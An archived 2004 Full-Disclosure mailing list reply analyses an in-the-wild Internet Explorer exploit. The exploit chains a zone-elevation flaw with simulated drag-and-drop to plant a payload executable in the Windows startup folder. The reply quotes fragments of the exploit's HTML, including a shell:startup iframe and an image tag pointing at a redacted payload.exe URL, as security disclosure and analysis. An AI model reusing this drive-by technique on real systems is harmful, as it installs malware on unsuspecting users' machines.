Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
Re: [Full-Disclosure] Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle shot!]
From: Alla Bezroutchko (allascanit.be)
Date: Tue Sep 07 2004 - 09:10:18 CDT
Martin Stricker wrote:
> I just got attached e-mail. On the linked website I found this exploit
> code (sorry for the line breaks):
As far as I can figure out it is a combination of two unpatched
vulnerabilities. First it uses method assignement vulnerability
(discovered by Paul (at) greyhats cjb net - see
http://www.securityfocus.com/archive/1/368671) to get into Local
Once in local computer zone it does what I believe is a variation of
drag and drop file installation vulnerability discovered by http-equiv.
The interesting twist is that instead of tricking the user into
dragging and dropping something (as mikx demonstrated at
http://www.mikx.de/scrollbar/) they get the user to click on an image
and then pull the window with the image from under the mouse to emulate
drag and drop.
First they create an iframe with shell:startup folder.
<iframe src=shell:startup HEIGHT=5000; WIDTH=5000
Then they open a popup window that covers the whole screen and shows an
image 1.gif using styles. The src of the image points to the payload
executable. The image is an animated gif that first shows a counter and
then says "Click to enter".
<span style=position: absolute; left: 1; top: 1 id=absspan>
<textarea id=txt rows=1 cols=20 style=display:none>
<html><body><table width=100% height=100%><tr ALIGN=LEFT
VALIGN=TOP><br><center><img src=http://removed/payload.exe id=anch
When the user clicks on the image, the underlying popup window is moved
by calling parent.pop.show(1,1,1,1) . So the image is effectively
dragged into shell:startup, and the excutable is installed in the
startup folder. This technique (pull the window from under the mouse to
emulate drag and drop) AFAIK was first shown by Liu Die Yu in
Another trick that they use is to download the payload executable first,
using XmlHTTP object. I think this is to get it cached, and make the
whole exploit more reliable.
Also interesting that they don't use
in this exploit which seems to be an essential part of http-equiv's and
Browser Security Test - http://bcheck.scanit.be/bcheck/
Full-Disclosure - We believe in it.